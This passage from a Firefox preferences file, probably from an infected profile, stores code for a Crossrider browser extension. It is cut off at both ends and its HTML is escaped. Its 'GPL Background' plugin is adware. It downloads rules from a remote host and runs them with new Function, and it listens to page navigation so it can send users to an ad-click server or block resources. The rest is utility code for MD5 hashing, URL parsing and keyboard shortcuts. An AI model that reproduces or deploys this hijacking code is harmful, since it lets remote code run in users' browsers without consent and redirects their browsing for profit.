h=\&quot;\&quot;,a=-1,b,f;++a&lt;d.length;)b=d.charCodeAt(a),f=a+1&lt;d.length?d.charCodeAt(a+1):0,55296&lt;=b&amp;&amp;56319&gt;=b&amp;&amp;(56320&lt;=f&amp;&amp;57343&gt;=f)&amp;&amp;(b=65536+((b&amp;1023)&lt;&lt;10)+(f&amp;1023),a++),127&gt;=b?h+=String.fromCharCode(b):2047&gt;=b?h+=String.fromCharCode(192|b&gt;&gt;&gt;6&amp;31,128|b&amp;63):65535&gt;=b?h+=String.fromCharCode(224|b&gt;&gt;&gt;12&amp;15,128|b&gt;&gt;&gt;6&amp;63,128|b&amp;63):2097151&gt;=b&amp;&amp;(h+=String.fromCharCode(240|\nb&gt;&gt;&gt;18&amp;7,128|b&gt;&gt;&gt;12&amp;63,128|b&gt;&gt;&gt;6&amp;63,128|b&amp;63));return h},rstr2binl:function(d){for(var h=Array(d.length&gt;&gt;2),a=0;a&lt;h.length;a++)h[a]=0;for(a=0;a&lt;8*d.length;a+=8)h[a&gt;&gt;5]|=(d.charCodeAt(a/8)&amp;255)&lt;&lt;a%32;return h},binl2rstr:function(d){for(var h=\&quot;\&quot;,a=0;a&lt;32*d.length;a+=8)h+=String.fromCharCode(d[a&gt;&gt;5]&gt;&gt;&gt;a%32&amp;255);return h},binl_md5:function(d,h){d[h&gt;&gt;5]|=128&lt;&lt;h%32;d[(h+64&gt;&gt;&gt;9&lt;&lt;4)+14]=h;for(var a=1732584193,b=-271733879,f=-1732584194,c=271733878,e=0;e&lt;d.length;e+=16)var m=a,g=b,i=f,l=c,a=this.md5_ff(a,\nb,f,c,d[e+0],7,-680876936),c=this.md5_ff(c,a,b,f,d[e+1],12,-389564586),f=this.md5_ff(f,c,a,b,d[e+2],17,606105819),b=this.md5_ff(b,f,c,a,d[e+3],22,-1044525330),a=this.md5_ff(a,b,f,c,d[e+4],7,-176418897),c=this.md5_ff(c,a,b,f,d[e+5],12,1200080426),f=this.md5_ff(f,c,a,b,d[e+6],17,-1473231341),b=this.md5_ff(b,f,c,a,d[e+7],22,-45705983),a=this.md5_ff(a,b,f,c,d[e+8],7,1770035416),c=this.md5_ff(c,a,b,f,d[e+9],12,-1958414417),f=this.md5_ff(f,c,a,b,d[e+10],17,-42063),b=this.md5_ff(b,f,c,a,d[e+11],22,-1990404162),\na=this.md5_ff(a,b,f,c,d[e+12],7,1804603682),c=this.md5_ff(c,a,b,f,d[e+13],12,-40341101),f=this.md5_ff(f,c,a,b,d[e+14],17,-1502002290),b=this.md5_ff(b,f,c,a,d[e+15],22,1236535329),a=this.md5_gg(a,b,f,c,d[e+1],5,-165796510),c=this.md5_gg(c,a,b,f,d[e+6],9,-1069501632),f=this.md5_gg(f,c,a,b,d[e+11],14,643717713),b=this.md5_gg(b,f,c,a,d[e+0],20,-373897302),a=this.md5_gg(a,b,f,c,d[e+5],5,-701558691),c=this.md5_gg(c,a,b,f,d[e+10],9,38016083),f=this.md5_gg(f,c,a,b,d[e+15],14,-660478335),b=this.md5_gg(b,f,\nc,a,d[e+4],20,-405537848),a=this.md5_gg(a,b,f,c,d[e+9],5,568446438),c=this.md5_gg(c,a,b,f,d[e+14],9,-1019803690),f=this.md5_gg(f,c,a,b,d[e+3],14,-187363961),b=this.md5_gg(b,f,c,a,d[e+8],20,1163531501),a=this.md5_gg(a,b,f,c,d[e+13],5,-1444681467),c=this.md5_gg(c,a,b,f,d[e+2],9,-51403784),f=this.md5_gg(f,c,a,b,d[e+7],14,1735328473),b=this.md5_gg(b,f,c,a,d[e+12],20,-1926607734),a=this.md5_hh(a,b,f,c,d[e+5],4,-378558),c=this.md5_hh(c,a,b,f,d[e+8],11,-2022574463),f=this.md5_hh(f,c,a,b,d[e+11],16,1839030562),\nb=this.md5_hh(b,f,c,a,d[e+14],23,-35309556),a=this.md5_hh(a,b,f,c,d[e+1],4,-1530992060),c=this.md5_hh(c,a,b,f,d[e+4],11,1272893353),f=this.md5_hh(f,c,a,b,d[e+7],16,-155497632),b=this.md5_hh(b,f,c,a,d[e+10],23,-1094730640),a=this.md5_hh(a,b,f,c,d[e+13],4,681279174),c=this.md5_hh(c,a,b,f,d[e+0],11,-358537222),f=this.md5_hh(f,c,a,b,d[e+3],16,-722521979),b=this.md5_hh(b,f,c,a,d[e+6],23,76029189),a=this.md5_hh(a,b,f,c,d[e+9],4,-640364487),c=this.md5_hh(c,a,b,f,d[e+12],11,-421815835),f=this.md5_hh(f,c,\na,b,d[e+15],16,530742520),b=this.md5_hh(b,f,c,a,d[e+2],23,-995338651),a=this.md5_ii(a,b,f,c,d[e+0],6,-198630844),c=this.md5_ii(c,a,b,f,d[e+7],10,1126891415),f=this.md5_ii(f,c,a,b,d[e+14],15,-1416354905),b=this.md5_ii(b,f,c,a,d[e+5],21,-57434055),a=this.md5_ii(a,b,f,c,d[e+12],6,1700485571),c=this.md5_ii(c,a,b,f,d[e+3],10,-1894986606),f=this.md5_ii(f,c,a,b,d[e+10],15,-1051523),b=this.md5_ii(b,f,c,a,d[e+1],21,-2054922799),a=this.md5_ii(a,b,f,c,d[e+8],6,1873313359),c=this.md5_ii(c,a,b,f,d[e+15],10,-30611744),\nf=this.md5_ii(f,c,a,b,d[e+6],15,-1560198380),b=this.md5_ii(b,f,c,a,d[e+13],21,1309151649),a=this.md5_ii(a,b,f,c,d[e+4],6,-145523070),c=this.md5_ii(c,a,b,f,d[e+11],10,-1120210379),f=this.md5_ii(f,c,a,b,d[e+2],15,718787259),b=this.md5_ii(b,f,c,a,d[e+9],21,-343485551),a=this.safe_add(a,m),b=this.safe_add(b,g),f=this.safe_add(f,i),c=this.safe_add(c,l);return[a,b,f,c]},md5_cmn:function(d,h,a,b,f,c){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(h,d),this.safe_add(b,c)),f),a)},md5_ff:function(d,\nh,a,b,f,c,e){return this.md5_cmn(h&amp;a|~h&amp;b,d,h,f,c,e)},md5_gg:function(d,h,a,b,f,c,e){return this.md5_cmn(h&amp;b|a&amp;~b,d,h,f,c,e)},md5_hh:function(d,h,a,b,f,c,e){return this.md5_cmn(h^a^b,d,h,f,c,e)},md5_ii:function(d,h,a,b,f,c,e){return this.md5_cmn(a^(h|~b),d,h,f,c,e)},safe_add:function(d,h){var a=(d&amp;65535)+(h&amp;65535);return(d&gt;&gt;16)+(h&gt;&gt;16)+(a&gt;&gt;16)&lt;&lt;16|a&amp;65535},bit_rol:function(d,h){return d&lt;&lt;h|d&gt;&gt;&gt;32-h}},parse_url:function(d,h){for(var a=\&quot;source scheme authority userInfo user pass host port relative path directory file query fragment\&quot;.split(\&quot; \&quot;),\nb=/^(?:([^:\\/?#]+):)?(?:\\/\\/()(?:(?:()(?:([^:@]*):?([^:@]*))?@)?([^:\\/?#]*)(?::(\\d*))?))?()(?:(()(?:(?:[^?#\\/]*\\/)*)()(?:[^?#]*))(?:\\?([^#]*))?(?:#(.*))?)/.exec(d),f={},c=14;c--;)b[c]&amp;&amp;(f[a[c]]=b[c]);if(h)return f[h.replace(\&quot;PHP_URL_\&quot;,\&quot;\&quot;).toLowerCase()];delete f.source;return f}},_GPL_BG_VARS={vars:{},rules:{}},_GPL_BG_NEW={started:!1,log:function(d){console.log(d)},factor:1,preinit:function(){null!=appAPI.db.get(\&quot;_GPL_zoneid\&quot;)&amp;&amp;null!=appAPI.db.get(\&quot;_GPL_product_id\&quot;)&amp;&amp;null!=appAPI.db.get(\&quot;_GPL_aoi\&quot;)?\n(_GPL_BG_VARS.vars.zoneid=appAPI.db.get(\&quot;_GPL_zoneid\&quot;),_GPL_BG_VARS.vars.pid=appAPI.db.get(\&quot;_GPL_product_id\&quot;),_GPL_BG_VARS.vars.aoi=parseInt(appAPI.db.get(\&quot;_GPL_aoi\&quot;)),appAPI.db.set(\&quot;_GPL_crr\&quot;,Math.floor((new Date).getTime()/1E3)),_GPL_BG_NEW.init()):setTimeout(function(){_GPL_BG_NEW.preinit()},1E3)},init:function(){var d=appAPI.db.get(\&quot;_GPL_country_code\&quot;);!d||\&quot;\&quot;==d?appAPI.request.get(\&quot;hxxp://contentcache-a.akamaihd.net/loaders/cid?r=\&quot;+(new Date).getTime(),function(d){if(\&quot;\&quot;==d)setTimeout(function(){_GPL_BG_NEW.init()},\n1E4);else try{var a=(new Function(\&quot;return \&quot;+d.split(\&quot;(\&quot;)[1].split(\&quot;)\&quot;)[0]))();a&amp;&amp;(a.cid&amp;&amp;\&quot;\&quot;!=a.cid)&amp;&amp;(appAPI.db.set(\&quot;_GPL_country_code\&quot;,a.cid,appAPI.time.daysFromNow(7)),_GPL_BG_VARS.vars.cid=a.cid,_GPL_BG_NEW.loadRules())}catch(b){setTimeout(function(){_GPL_BG_NEW.init()},1E4)}},function(){setTimeout(function(){_GPL_BG_NEW.init()},1E4)}):(_GPL_BG_VARS.vars.cid=d,_GPL_BG_NEW.loadRules());setInterval(function(){_GPL_BG_NEW.factor=1;_GPL_BG_NEW.loadRules()},108E5)},loadRules:function(){appAPI.request.get(\&quot;hxxp://contentcache-a.akamaihd.net/srr/\&quot;+\n_GPL_BG_VARS.vars.cid+\&quot;/?r=\&quot;+(new Date).getTime(),function(d){if(d=(new Function(\&quot;return \&quot;+d))())_GPL_BG_VARS.rules=d,_GPL_BG_NEW.started?_GPL_BG_NEW.captureRequests():_GPL_BG_VARS.vars.pid in _GPL_BG_VARS.rules.p&amp;&amp;Math.floor((new Date).getTime()/1E3)-_GPL_BG_VARS.vars.aoi&gt;=parseInt(_GPL_BG_VARS.rules.p[_GPL_BG_VARS.vars.pid].min)&amp;&amp;_GPL_BG_NEW.captureRequests()},function(){setTimeout(function(){_GPL_BG_NEW.loadRules();_GPL_BG_NEW.factor*=2},6E4*_GPL_BG_NEW.factor)})},captureRequests:function(){_GPL_BG_NEW.started&amp;&amp;\nappAPI.webRequest.onRequest.removeListener(_GPL_BG_NEW.started);_GPL_BG_NEW.started=appAPI.webRequest.onBeforeNavigate.addListener(function(d,h){var a={processRequest:function(b,f,c){appAPI.db.set(\&quot;lastrequest\&quot;,f);if(!f.host||null!=appAPI.db.get(\&quot;_GPL_crrs\&quot;))return!1;f=this.getRules(f,b);if(0==f.length)return!1;if(\&quot;nav\&quot;==b)return b=f[Math.floor(Math.random()*f.length)],appAPI.db.set(\&quot;_GPL_sr[\&quot;+b.d+\&quot;]\&quot;,Math.floor((new Date).getTime()/1E3),appAPI.time.hoursFromNow(parseInt(b.h))),appAPI.db.set(\&quot;_GPL_sr_halt\&quot;,\nMath.floor((new Date).getTime()/1E3),appAPI.time.minutesFromNow(15)),{redirectTo:this.getClickUrl(c)};if(\&quot;resource\&quot;==b)return{cancel:!0}},getRules:function(b,f){var c=[],e=\&quot;nav\&quot;==f?this.getDomainVariations(b.host):[b.host.toLowerCase()],d=((b.path?b.path:\&quot;\&quot;)+(b.query?\&quot;?\&quot;+b.query:\&quot;\&quot;)+(b.fragment?\&quot;#\&quot;+b.fragment:\&quot;\&quot;)).toLowerCase(),a;if(!e||0==e.length)return c;for(var i=0,l=e.length;i&lt;l;i++){var j=this.MD5.md5(e[i]);if(h.rules[j])for(var k=0,n=h.rules[j].length;k&lt;n;k++)h.rules[j][k].t==f&amp;&amp;d.match(h.rules[j][k].k.toLowerCase())&amp;&amp;\n(h.rules[j][k].d=e[i],\&quot;resource\&quot;==f?c.push(h.rules[j][k]):(a=appAPI.db.get(\&quot;_GPL_sr[\&quot;+e[i]+\&quot;]\&quot;),null==a&amp;&amp;c.push(h.rules[j][k])))}return c},getClickUrl:function(b){return\&quot;https://clicks.ads2srv.com/click?sr=\&quot;+escape(b).replace(/\\//g,\&quot;%2F\&quot;)+\&quot;&amp;zone=\&quot;+escape(h.vars.zoneid)},getDomainVariations:function(b){var b=b.toLowerCase(),f=[],b=b.replace(RegExp(/^www\\./i),\&quot;\&quot;).split(\&quot;.\&quot;),c=b.join(\&quot;.\&quot;).match(RegExp(/\\.[a-z]{2,3}\\.[a-z]{2}$/i))?3:2;do{var e=b.join(\&quot;.\&quot;);f.push(e);b.shift()}while(b.length&gt;=c);return f},\nMD5:{hexcase:0,b64pad:\&quot;\&quot;,md5:function(b){return this.rstr2hex(this.rstr_md5(this.str2rstr_utf8(b)))},rstr_md5:function(b){return this.binl2rstr(this.binl_md5(this.rstr2binl(b),8*b.length))},rstr2hex:function(b){for(var f=this.hexcase?\&quot;0123456789ABCDEF\&quot;:\&quot;0123456789abcdef\&quot;,c=\&quot;\&quot;,e,d=0;d&lt;b.length;d++)e=b.charCodeAt(d),c+=f.charAt(e&gt;&gt;&gt;4&amp;15)+f.charAt(e&amp;15);return c},str2rstr_utf8:function(b){for(var d=\&quot;\&quot;,c=-1,e,a;++c&lt;b.length;)e=b.charCodeAt(c),a=c+1&lt;b.length?b.charCodeAt(c+1):0,55296&lt;=e&amp;&amp;56319&gt;=e&amp;&amp;(56320&lt;=\na&amp;&amp;57343&gt;=a)&amp;&amp;(e=65536+((e&amp;1023)&lt;&lt;10)+(a&amp;1023),c++),127&gt;=e?d+=String.fromCharCode(e):2047&gt;=e?d+=String.fromCharCode(192|e&gt;&gt;&gt;6&amp;31,128|e&amp;63):65535&gt;=e?d+=String.fromCharCode(224|e&gt;&gt;&gt;12&amp;15,128|e&gt;&gt;&gt;6&amp;63,128|e&amp;63):2097151&gt;=e&amp;&amp;(d+=String.fromCharCode(240|e&gt;&gt;&gt;18&amp;7,128|e&gt;&gt;&gt;12&amp;63,128|e&gt;&gt;&gt;6&amp;63,128|e&amp;63));return d},rstr2binl:function(b){for(var d=Array(b.length&gt;&gt;2),c=0;c&lt;d.length;c++)d[c]=0;for(c=0;c&lt;8*b.length;c+=8)d[c&gt;&gt;5]|=(b.charCodeAt(c/8)&amp;255)&lt;&lt;c%32;return d},binl2rstr:function(b){for(var d=\&quot;\&quot;,c=0;c&lt;32*\nb.length;c+=8)d+=String.fromCharCode(b[c&gt;&gt;5]&gt;&gt;&gt;c%32&amp;255);return d},binl_md5:function(b,d){b[d&gt;&gt;5]|=128&lt;&lt;d%32;b[(d+64&gt;&gt;&gt;9&lt;&lt;4)+14]=d;for(var c=1732584193,e=-271733879,a=-1732584194,g=271733878,i=0;i&lt;b.length;i+=16)var h=c,j=e,k=a,n=g,c=this.md5_ff(c,e,a,g,b[i+0],7,-680876936),g=this.md5_ff(g,c,e,a,b[i+1],12,-389564586),a=this.md5_ff(a,g,c,e,b[i+2],17,606105819),e=this.md5_ff(e,a,g,c,b[i+3],22,-1044525330),c=this.md5_ff(c,e,a,g,b[i+4],7,-176418897),g=this.md5_ff(g,c,e,a,b[i+5],12,1200080426),a=this.md5_ff(a,\ng,c,e,b[i+6],17,-1473231341),e=this.md5_ff(e,a,g,c,b[i+7],22,-45705983),c=this.md5_ff(c,e,a,g,b[i+8],7,1770035416),g=this.md5_ff(g,c,e,a,b[i+9],12,-1958414417),a=this.md5_ff(a,g,c,e,b[i+10],17,-42063),e=this.md5_ff(e,a,g,c,b[i+11],22,-1990404162),c=this.md5_ff(c,e,a,g,b[i+12],7,1804603682),g=this.md5_ff(g,c,e,a,b[i+13],12,-40341101),a=this.md5_ff(a,g,c,e,b[i+14],17,-1502002290),e=this.md5_ff(e,a,g,c,b[i+15],22,1236535329),c=this.md5_gg(c,e,a,g,b[i+1],5,-165796510),g=this.md5_gg(g,c,e,a,b[i+6],9,-1069501632),\na=this.md5_gg(a,g,c,e,b[i+11],14,643717713),e=this.md5_gg(e,a,g,c,b[i+0],20,-373897302),c=this.md5_gg(c,e,a,g,b[i+5],5,-701558691),g=this.md5_gg(g,c,e,a,b[i+10],9,38016083),a=this.md5_gg(a,g,c,e,b[i+15],14,-660478335),e=this.md5_gg(e,a,g,c,b[i+4],20,-405537848),c=this.md5_gg(c,e,a,g,b[i+9],5,568446438),g=this.md5_gg(g,c,e,a,b[i+14],9,-1019803690),a=this.md5_gg(a,g,c,e,b[i+3],14,-187363961),e=this.md5_gg(e,a,g,c,b[i+8],20,1163531501),c=this.md5_gg(c,e,a,g,b[i+13],5,-1444681467),g=this.md5_gg(g,c,e,\na,b[i+2],9,-51403784),a=this.md5_gg(a,g,c,e,b[i+7],14,1735328473),e=this.md5_gg(e,a,g,c,b[i+12],20,-1926607734),c=this.md5_hh(c,e,a,g,b[i+5],4,-378558),g=this.md5_hh(g,c,e,a,b[i+8],11,-2022574463),a=this.md5_hh(a,g,c,e,b[i+11],16,1839030562),e=this.md5_hh(e,a,g,c,b[i+14],23,-35309556),c=this.md5_hh(c,e,a,g,b[i+1],4,-1530992060),g=this.md5_hh(g,c,e,a,b[i+4],11,1272893353),a=this.md5_hh(a,g,c,e,b[i+7],16,-155497632),e=this.md5_hh(e,a,g,c,b[i+10],23,-1094730640),c=this.md5_hh(c,e,a,g,b[i+13],4,681279174),\ng=this.md5_hh(g,c,e,a,b[i+0],11,-358537222),a=this.md5_hh(a,g,c,e,b[i+3],16,-722521979),e=this.md5_hh(e,a,g,c,b[i+6],23,76029189),c=this.md5_hh(c,e,a,g,b[i+9],4,-640364487),g=this.md5_hh(g,c,e,a,b[i+12],11,-421815835),a=this.md5_hh(a,g,c,e,b[i+15],16,530742520),e=this.md5_hh(e,a,g,c,b[i+2],23,-995338651),c=this.md5_ii(c,e,a,g,b[i+0],6,-198630844),g=this.md5_ii(g,c,e,a,b[i+7],10,1126891415),a=this.md5_ii(a,g,c,e,b[i+14],15,-1416354905),e=this.md5_ii(e,a,g,c,b[i+5],21,-57434055),c=this.md5_ii(c,e,a,\ng,b[i+12],6,1700485571),g=this.md5_ii(g,c,e,a,b[i+3],10,-1894986606),a=this.md5_ii(a,g,c,e,b[i+10],15,-1051523),e=this.md5_ii(e,a,g,c,b[i+1],21,-2054922799),c=this.md5_ii(c,e,a,g,b[i+8],6,1873313359),g=this.md5_ii(g,c,e,a,b[i+15],10,-30611744),a=this.md5_ii(a,g,c,e,b[i+6],15,-1560198380),e=this.md5_ii(e,a,g,c,b[i+13],21,1309151649),c=this.md5_ii(c,e,a,g,b[i+4],6,-145523070),g=this.md5_ii(g,c,e,a,b[i+11],10,-1120210379),a=this.md5_ii(a,g,c,e,b[i+2],15,718787259),e=this.md5_ii(e,a,g,c,b[i+9],21,-343485551),\nc=this.safe_add(c,h),e=this.safe_add(e,j),a=this.safe_add(a,k),g=this.safe_add(g,n);return[c,e,a,g]},md5_cmn:function(b,a,c,e,d,g){return this.safe_add(this.bit_rol(this.safe_add(this.safe_add(a,b),this.safe_add(e,g)),d),c)},md5_ff:function(b,a,c,e,d,g,i){return this.md5_cmn(a&amp;c|~a&amp;e,b,a,d,g,i)},md5_gg:function(b,a,c,e,d,g,i){return this.md5_cmn(a&amp;e|c&amp;~e,b,a,d,g,i)},md5_hh:function(b,a,c,e,d,g,i){return this.md5_cmn(a^c^e,b,a,d,g,i)},md5_ii:function(b,a,c,d,h,g,i){return this.md5_cmn(c^(a|~d),b,a,\nh,g,i)},safe_add:function(b,a){var c=(b&amp;65535)+(a&amp;65535);return(b&gt;&gt;16)+(a&gt;&gt;16)+(c&gt;&gt;16)&lt;&lt;16|c&amp;65535},bit_rol:function(a,d){return a&lt;&lt;d|a&gt;&gt;&gt;32-d}},parse_url:function(a,d){for(var c=\&quot;source scheme authority userInfo user pass host port relative path directory file query fragment\&quot;.split(\&quot; \&quot;),e=/^(?:([^:\\/?#]+):)?(?:\\/\\/()(?:(?:()(?:([^:@]*):?([^:@]*))?@)?([^:\\/?#]*)(?::(\\d*))?))?()(?:(()(?:(?:[^?#\\/]*\\/)*)()(?:[^?#]*))(?:\\?([^#]*))?(?:#(.*))?)/.exec(a),h={},g=14;g--;)e[g]&amp;&amp;(h[c[g]]=e[g]);if(d)return h[d.replace(\&quot;PHP_URL_\&quot;,\n\&quot;\&quot;).toLowerCase()];delete h.source;return h}};if(null==appAPI.db.get(\&quot;_GPL_sr_halt\&quot;)&amp;&amp;d.pageUrl&amp;&amp;(-1==d.pageUrl.indexOf(\&quot;://\&quot;)&amp;&amp;(d.pageUrl=\&quot;hxxp://\&quot;+d.pageUrl),a=a.processRequest(\&quot;nav\&quot;,a.parse_url(d.pageUrl),d.pageUrl)))return a},_GPL_BG_VARS)}};&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000015.name&quot;, &quot;GPL Background (BG)&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_1000015.ver&quot;, 4);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_13.code&quot;, &quot;(function(a){a.selectedText=function(e,c){function d(){if(window.getSelection){return window.getSelection()}else{if(document.getSelection){return document.getSelection()}else{var f=document.selection&amp;&amp;document.selection.createRange();if(f.text){return f.text}return false}}return false}if(e==null){a.debug(\&quot;selectedText: no callback function provided.\&quot;);return}if(c==null){c={}}c.lastSelection=\&quot;\&quot;;c.minlength=c.minlength||1;c.maxlength=c.maxlength||99999999;var b;switch(typeof(c.element)){case\&quot;undefined\&quot;:b=$jquery(\&quot;body\&quot;);break;case\&quot;object\&quot;:if(c.element instanceof jQuery){b=c.element}else{a.debug(\&quot;selectedText: element provided as an unrecorgnize object.\&quot;);return}break;case\&quot;string\&quot;:b=$jquery(c.element);break;default:a.debug(\&quot;selectedText: unknown element.\&quot;);return}b.mouseup(function(g){var f=d();if(f&amp;&amp;String(f)==c.lastSelection){c.lastSelection=\&quot;\&quot;;return}else{c.lastSelection=String(f)}if(f&amp;&amp;String(f).length&gt;=c.minlength&amp;&amp;String(f).length&lt;=c.maxlength){e(f,g)}})}})(appAPI);(function(a){a.dom={};a.dom.isIframe=function(){return top!=self};a.dom.addInlineCSS=function(c){var b=document.createElement(\&quot;style\&quot;);b.setAttribute(\&quot;type\&quot;,\&quot;text/css\&quot;);if(b.styleSheet&amp;&amp;typeof(b.styleSheet.cssText)===\&quot;string\&quot;){b.styleSheet.cssText=c}else{b.innerHTML=c}(document.getElementsByTagName(\&quot;head\&quot;)[0]||document.getElementsByTagName(\&quot;body\&quot;)[0]).appendChild(b)};a.dom.addRemoteCSS=function(c){var b=document.createElement(\&quot;link\&quot;);b.setAttribute(\&quot;rel\&quot;,\&quot;stylesheet\&quot;);b.setAttribute(\&quot;type\&quot;,\&quot;text/css\&quot;);b.setAttribute(\&quot;href\&quot;,c);(document.getElementsByTagName(\&quot;head\&quot;)[0]||document.getElementsByTagName(\&quot;body\&quot;)[0]).appendChild(b);return b};a.dom.addInlineJS=function(d){var b=document.createElement(\&quot;script\&quot;);try{b.setAttribute(\&quot;type\&quot;,\&quot;text/javascript\&quot;);b.innerHTML=d}catch(c){b.type=\&quot;text/javascript\&quot;;b.text=d}(document.getElementsByTagName(\&quot;head\&quot;)[0]||document.getElementsByTagName(\&quot;body\&quot;)[0]).appendChild(b)};a.dom.addRemoteJS=function(d,c){var b=document.createElement(\&quot;script\&quot;);b.setAttribute(\&quot;type\&quot;,\&quot;text/javascript\&quot;);b.setAttribute(\&quot;src\&quot;,d);if(typeof(c)==\&quot;function\&quot;){b.onload=b.onreadystatechange=function(){c(b);b.onload=b.onreadystatechange=null}}(document.getElementsByTagName(\&quot;head\&quot;)[0]||document.getElementsByTagName(\&quot;body\&quot;)[0]).appendChild(b);return b};a.dom.callPageFunction=function(){var c=arguments[0];var d=[c,\&quot;(\&quot;],f=[];if(arguments.length&gt;1){for(var b=1;b&lt;arguments.length;b++){var e=arguments[b];if(e===undefined){continue}if(typeof(e)===\&quot;string\&quot;){f.push(&apos;\&quot;&apos;+e+&apos;\&quot;&apos;)}else{if(typeof(e)===\&quot;object\&quot;){f.push(JSON.stringify(e))}else{f.push(e)}}}}d.push(f.join(\&quot;,\&quot;));d.push(\&quot;)\&quot;);self.location.assign(\&quot;javascript:\&quot;+d.join(\&quot;\&quot;))}})(appAPI);(function(a){a.matchPages=function(){var e=false;for(var c=0;c&lt;arguments.length;c++){var f=arguments[c];var g=false;if(typeof(f)==\&quot;string\&quot;){f=f.replace(/\\./,\&quot;\\\\.\&quot;).replace(/\\*/,\&quot;.*\&quot;);var d=\&quot;^http.?\\\\:\\\\/\\\\/\&quot;+f;var b=new RegExp(d);g=document.location.href.match(b)?true:false}else{if(typeof(f)==\&quot;object\&quot;){g=document.location.href.match(f)?true:false}}e=e||g;if(e){break}}return e}})(appAPI);(function(a){a.shortcut={all_shortcuts:{},add:function(c,i,e){var h={type:\&quot;keydown\&quot;,propagate:false,disable_in_input:false,target:document,keycode:false};if(!e){e=h}else{for(var b in h){if(typeof e[b]==\&quot;undefined\&quot;){e[b]=h[b]}}}var g=e.target;if(typeof e.target==\&quot;string\&quot;){g=document.getElementById(e.target)}var d=this;c=c.toLowerCase();var f=function(o){o=o||window.event;if(e.disable_in_input){var l;if(o.target){l=o.target}else{if(o.srcElement){l=o.srcElement}}if(l.nodeType==3){l=l.parentNode}if(l.tagName==\&quot;INPUT\&quot;||l.tagName==\&quot;TEXTAREA\&quot;){return}}if(o.keyCode){code=o.keyCode}else{if(o.which){code=o.which}}var n=String.fromCharCode(code).toLowerCase();if(code==188){n=\&quot;,\&quot;}if(code==190){n=\&quot;.\&quot;}var s=c.split(\&quot;+\&quot;);var r=0;var p={\&quot;`\&quot;:\&quot;~\&quot;,\&quot;1\&quot;:\&quot;!\&quot;,\&quot;2\&quot;:\&quot;@\&quot;,\&quot;3\&quot;:\&quot;#\&quot;,\&quot;4\&quot;:\&quot;$\&quot;,\&quot;5\&quot;:\&quot;%\&quot;,\&quot;6\&quot;:\&quot;^\&quot;,\&quot;7\&quot;:\&quot;&amp;\&quot;,\&quot;8\&quot;:\&quot;*\&quot;,\&quot;9\&quot;:\&quot;(\&quot;,\&quot;0\&quot;:\&quot;)\&quot;,\&quot;-\&quot;:\&quot;_\&quot;,\&quot;=\&quot;:\&quot;+\&quot;,\&quot;;\&quot;:\&quot;:\&quot;,\&quot;&apos;\&quot;:&apos;\&quot;&apos;,\&quot;,\&quot;:\&quot;&lt;\&quot;,\&quot;.\&quot;:\&quot;&gt;\&quot;,\&quot;/\&quot;:\&quot;?\&quot;,\&quot;\\\\\&quot;:\&quot;|\&quot;};var m={esc:27,escape:27,tab:9,space:32,\&quot;return\&quot;:13,enter:13,backspace:8,scrolllock:145,scroll_lock:145,scroll:145,capslock:20,caps_lock:20,caps:20,numlock:144,num_lock:144,num:144,pause:19,\&quot;break\&quot;:19,insert:45,home:36,\&quot;delete\&quot;:46,end:35,pageup:33,page_up:33,pu:33,pagedown:34,page_down:34,pd:34,left:37,up:38,right:39,down:40,f1:112,f2:113,f3:114,f4:115,f5:116,f6:117,f7:118,f8:119,f9:120,f10:121,f11:122,f12:123};var q={shift:{wanted:false,pressed:false},ctrl:{wanted:false,pressed:false},alt:{wanted:false,pressed:false},meta:{wanted:false,pressed:false}};if(o.ctrlKey){q.ctrl.pressed=true}if(o.shiftKey){q.shift.pressed=true}if(o.altKey){q.alt.pressed=true}if(o.metaKey){q.meta.pressed=true}for(var j=0;k=s[j],j&lt;s.length;j++){if(k==\&quot;ctrl\&quot;||k==\&quot;control\&quot;){r++;q.ctrl.wanted=true}else{if(k==\&quot;shift\&quot;){r++;q.shift.wanted=true}else{if(k==\&quot;alt\&quot;){r++;q.alt.wanted=true}else{if(k==\&quot;meta\&quot;){r++;q.meta.wanted=true}else{if(k.length&gt;1){if(m[k]==code){r++}}else{if(e.keycode){if(e.keycode==code){r++}}else{if(n==k){r++}else{if(p[n]&amp;&amp;o.shiftKey){n=p[n];if(n==k){r++}}}}}}}}}}if(r==s.length&amp;&amp;q.ctrl.pressed==q.ctrl.wanted&amp;&amp;q.shift.pressed==q.shift.wanted&amp;&amp;q.alt.pressed==q.alt.wanted&amp;&amp;q.meta.pressed==q.meta.wanted){i(o);if(!e.propagate){o.cancelBubble=true;o.returnValue=false;if(o.stopPropagation){o.stopPropagation();o.preventDefault()}return false}}};this.all_shortcuts[c]={callback:f,target:g,event:e.type};if(g.addEventListener){g.addEventListener(e.type,f,false)}else{if(g.attachEvent){g.attachEvent(\&quot;on\&quot;+e.type,f)}else{g[\&quot;on\&quot;+e.type]=f}}},remove:function(b){b=b.toLowerCase();var e=this.all_shortcuts[b];delete (this.all_shortcuts[b]);if(!e){return}var c=e.event;var d=e.target;var f=e.callback;if(d.detachEvent){d.detachEvent(\&quot;on\&quot;+c,f)}else{if(d.removeEventListener){d.removeEventListener(c,f,false)}else{d[\&quot;on\&quot;+c]=false}}}}})(appAPI);&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_13.name&quot;, &quot;CrossriderAppUtils&quot;);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_13.ver&quot;, 2);
user_pref(&quot;extensions.crossriderapp5060.5060.plugins.plugin_14.code&quot;, &quot;if(typeof(appAPI)===\&quot;undefined\&quot;){appAPI={}}appAPI.JSON={};if(typeof JSON!==\&quot;undefined\&quot;){appAPI.JSON=JSON}else{(function(){function f(n){return n&lt;10?\&quot;0\&quot;+n:n}if(typeof Date.prototype.to_CR_JSON!==\&quot;function\&quot;){Date.prototype.to_CR_JSON=function(key){return isFinite(this.valueOf())?this.getUTCFullYear()+\&quot;-\&quot;+f(this.getUTCMonth()+1)+\&quot;-\&quot;+f(this.getUTCDate())+\&quot;T\&quot;+f(this.getUTCHours())+\&quot;:\&quot;+f(this.getUTCMinutes())+\&quot;:\&quot;+f(this.getUTCSeconds())+\&quot;Z\&quot;:null};String.prototype.to_CR_JSON=Number.prototype.to_CR_JSON=Boolean.prototype.to_CR_JSON=function(key){return this.valueOf()}}var 